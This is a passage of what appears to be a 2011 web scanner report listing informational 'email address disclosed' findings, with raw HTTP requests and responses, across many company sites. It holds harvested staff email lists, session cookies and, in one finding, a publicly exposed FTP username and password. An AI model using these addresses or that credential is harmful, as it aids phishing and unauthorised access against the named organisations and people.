* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

22.43. http://www.conferenceservers.com/brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conferenceservers.com
Path:	/brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe

Issue detail

The following email address was disclosed in the response:

customerservice@soundpath.net

Request

GET /brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/
Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN

Response

HTTP/1.1 200 OK
Content-Length: 3272440
Content-Type: application/octet-stream
Last-Modified: Sun, 08 May 2011 01:42:32 GMT
Accept-Ranges: bytes
ETag: "1f69cd3221dcc1:4129"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:12 GMT
Connection: close

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
$...............................V...........W...................................
...[SNIP]...
"true"
enablegivecontrolmenu "true"
summaryreport_displayname ""
summaryreport_email ""
summaryreport_subject ""
attendeeinvitation_displayname "Soundpath Conferencing"
attendeeinvitation_email "customerservice@soundpath.net"
attendeeinvitation_subject "Soundpath Meeting Invitation"
enablescaling "true"
enablechathost "true"
enablewaitingroom "undefined"
enablenavigation "true"
enablechatparticipant "true"
enablese
...[SNIP]...
ton1_img ""
custombutton1_cmd ""
custombutton1_caption ""
custombutton1_tooltip ""
custombutton2_img ""
custombutton2_cmd ""
custombutton2_caption ""
custombutton2_tooltip ""
usersupportemail "customerservice@soundpath.net"
usersupportinfourl "https://ash-cs7.conferenceservers.com/docs/user?brand=soundpatheview"
usersupporttelephone "800-606-3494"
usersupporttelephonehours "For assistance during a web session, please
...[SNIP]...

22.44. http://www.csscorp.com/js/mega_dropdown.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/js/mega_dropdown.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/mega_dropdown.js HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:12 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Tue, 08 Mar 2011 15:09:54 GMT
ETag: "51018e-64e-49dfa012db480"
Accept-Ranges: bytes
Content-Length: 1614
Connection: close
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.45. http://www.digiware.net/formularios/form3.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digiware.net
Path:	/formularios/form3.php

Issue detail

The following email addresses were disclosed in the response:

info-ch@digiware.net
info-ec@digiware.net
info-pe@digiware.net
info-usa@digiware.net
info@digiware-ec.net
info@digiware-pe.net
info@digiware-usa.net
info@digiware.net

Request

GET /formularios/form3.php HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 4165
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=utf-8">
<title>Untitled Document</title>
</head>
...[SNIP]...
<span style="font-weight: normal;">info-ch@digiware.net</span>
...[SNIP]...
<a href="mailto:info@digiware.net">info@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-pe.net">info-pe@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-ec.net">info-ec@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-usa.net">info-usa@digiware.net</a>
...[SNIP]...

22.46. http://www.foxbusiness.com/static/all/js/jquery.plugins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxbusiness.com
Path:	/static/all/js/jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /static/all/js/jquery.plugins.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c3401e-1e428-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2799
Date: Thu, 12 May 2011 11:38:10 GMT
Connection: close
Content-Length: 123944

// jQuery Plugins And Extensions. Updated: 09/15/2010

(function($){

/***** jQuery Extensions *****//*
Custom / Opensource extensions
******************************/

// Provides a custom context wh
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.47. http://www.friedkanelaw.com/Attorneys/jbh_main.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.friedkanelaw.com
Path:	/Attorneys/jbh_main.htm

Issue detail

The following email address was disclosed in the response:

jbh@friedkanelaw.com

Request

GET /Attorneys/jbh_main.htm HTTP/1.1
Host: www.friedkanelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.friedkanelaw.com/Second/attorneys_main.htm

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:32 GMT
Content-Length: 5352
Content-Type: text/html
Last-Modified: Fri, 05 Feb 2010 17:08:30 GMT
Accept-Ranges: bytes
ETag: "b28572d785a6ca1:cae"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"><head><meta http-equiv="Co
...[SNIP]...
<a href="mailto:jbh@friedkanelaw.com">jbh@friedkanelaw.com</a>
...[SNIP]...

22.48. http://www.gobignetwork.com/content/js/jquery/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gobignetwork.com
Path:	/content/js/jquery/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /content/js/jquery/jquery.hoverIntent.js HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
Referer: http://www.gobignetwork.com/funding
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 26 Apr 2011 18:40:19 GMT
Accept-Ranges: bytes
ETag: "c717e64414cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:21 GMT
Content-Length: 1836

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
*
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.49. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

ikaplan@beneschlaw.com

Request

Response

22.50. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

dzimmerman@porterwright.com

Request

Response

22.51. http://www.hbsr.com/contact_us/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/contact_us/index

Issue detail

The following email address was disclosed in the response:

info@hbsr.com

Request

GET /contact_us/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:info@hbsr.com" onclick="return email_verify();" title="Email">info@hbsr.com</a>
...[SNIP]...

22.52. http://www.huroncapital.com/secure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huroncapital.com
Path:	/secure/

Issue detail

The following email address was disclosed in the response:

bzylstra@huroncapital.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...
<a href="mailto:bzylstra@huroncapital.com">bzylstra@huroncapital.com</a>
...[SNIP]...

22.53. http://www.korteco.com/ftp-info previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.korteco.com
Path:	/ftp-info

Issue detail

The following email addresses were disclosed in the response:

ftphelp@korteco.com
password@ftp.site.com
shovel55@tkcftp.korteco.com

Request

GET /ftp-info HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.korteco.com/live-project
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5; has_js=1; __utma=91397376.1526762305.1305205892.1305205892.1305205892.1; __utmb=91397376.2.10.1305205892; __utmc=91397376; __utmz=91397376.1305205892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Thu, 12 May 2011 13:12:07 GMT
ETag: "3c6201c70b4fe5571296a07dc19ca3d7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<a href="mailto:ftphelp@korteco.com">ftphelp@korteco.com</a>
...[SNIP]...
<a href="ftp://username:password@ftp.site.com" title="ftp://username:password@ftp.site.com">ftp://username:password@ftp.site.com</a>
...[SNIP]...
<a href="ftp://subcontractor:shovel55@tkcftp.korteco.com" title="ftp://subcontractor:shovel55@tkcftp.korteco.com">ftp://subcontractor:shovel55@tkcftp.korteco.com</a>
...[SNIP]...
<a href="mailto:ftphelp@korteco.com">ftphelp@korteco.com</a>
...[SNIP]...

22.54. http://www.milbank.com/en/Alumni/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.milbank.com
Path:	/en/Alumni/

Issue detail

The following email address was disclosed in the response:

alumni@milbank.com

Request

GET /en/Alumni/ HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en/AboutUsHistory/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Milbank Alumni</title>

       <meta name="GENERAT
...[SNIP]...
<a title="mailto:alumni@milbank.com" href="mailto:alumni@milbank.com">alumni@milbank.com</a>
...[SNIP]...

22.55. http://www.mimecast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

Response

22.56. http://www.mimecast.com/About-us/Contact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/About-us/Contact-us/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

Response

22.57. http://www.mimecast.com/Customers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/Customers/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

GET /Customers/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.3.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:14 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:14 GMT
Content-Length: 59462

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Reviews | Mimecast Customers</title>
<META NAME="DESCRIPTION" CONTENT="With renewal rates running a
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.58. http://www.mimecast.com/How-to-buy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/How-to-buy/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

GET /How-to-buy/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:31 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:31 GMT
Content-Length: 87694

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Pricing | Find the Best Cost Solution for Your Business</title>
<META NAME="DESCRIPTION" CONTENT="Mimecas
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.59. http://www.mimecast.com/News-and-views/Press-releases/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/News-and-views/Press-releases/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

GET /News-and-views/Press-releases/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.3.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:18 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:17 GMT
Content-Length: 44075

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Press Releases | Mimecast News</title>
<META NAME="DESCRIPTION" CONTENT="Read Mimecast press releas
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.60. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:26 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:26 GMT
Content-Length: 29960

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewpor
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.61. http://www.mimecast.com/Scripts/howtobuy.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/Scripts/howtobuy.js

Issue detail

The following email address was disclosed in the response:

dharmavir@gmail.com

Request

GET /Scripts/howtobuy.js HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/How-to-buy/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=303c07d-12fe4358101-13064b3c-1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Feb 2011 15:50:56 GMT
Accept-Ranges: bytes
ETag: "7721274ba8d2cb1:0"
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:33 GMT
Content-Length: 30197

//##############################
// jQuery Custom Radio-buttons and Checkbox; basically it's styling/theming for Checkbox and Radiobutton elements in forms
// By Dharmavirsinh Jhala - dharmavir@gmail.com
// Date of Release: 13th March 10
// Version: 0.8
/*
USAGE:
   $(document).ready(function(){
       $(":radio").behaveLikeCheckbox();
   }
*/

var elmHeight = "35";    // should be specified based on i
...[SNIP]...

22.62. http://www.mimecast.com/Scripts/jquery.colorbox.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/Scripts/jquery.colorbox.min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /Scripts/jquery.colorbox.min.js HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/About-us/Contact-us/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 30 Dec 2010 12:44:49 GMT
Accept-Ranges: bytes
ETag: "80f65a581fa8cb1:0"
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:37:53 GMT
Content-Length: 9029

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",
...[SNIP]...

22.63. http://www.mimecast.com/Templates/Pages/images/icons/desktop.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/Templates/Pages/images/icons/desktop.png

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

GET /Templates/Pages/images/icons/desktop.png HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/How-to-buy/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=303c07d-12fe4358101-13064b3c-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:37 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:37 GMT
Content-Length: 23734

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" con
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.64. http://www.mimecast.com/What-we-offer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/What-we-offer/

Issue detail

The following email address was disclosed in the response:

info@mimecast.com

Request

Response

22.65. http://www.moritthock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moritthock.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

ahock@moritthock.com
bgarver@moritthock.com
bgeizhals@moritthock.com
bklineberg@moritthock.com
cclarke@moritthock.com
chamada@moritthock.com
dcohen@moritthock.com
dkucica@moritthock.com
dorourke@moritthock.com
dsaperman@moritthock.com
dwechsler@moritthock.com
emencher@moritthock.com
ewalsh@moritthock.com
ghisiger@moritthock.com
hklosowski@moritthock.com
joneil@moritthock.com
jsummers@moritthock.com
jtrafimow@moritthock.com
kbraun@moritthock.com
klawrence@moritthock.com
lberkoff@moritthock.com
lkoroleva@moritthock.com
lmendelson@moritthock.com
lpistilli@moritthock.com
mcardello@moritthock.com
mespey@moritthock.com
mgreenberg@moritthock.com
mhamroff@moritthock.com
mre@moritthock.com
nhampton@moritthock.com
nmoritt@moritthock.com
rcohen@moritthock.com
rfernbach@moritthock.com
rschonfeld@moritthock.com
rtils@moritthock.com
rzelin@moritthock.com
sginsberg@moritthock.com
sstein@moritthock.com
sturman@moritthock.com
tarenth@moritthock.com
tdriscoll@moritthock.com
wheberer@moritthock.com
wlaino@moritthock.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_visit=989860894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_last_activity=1305220894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:34 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59262

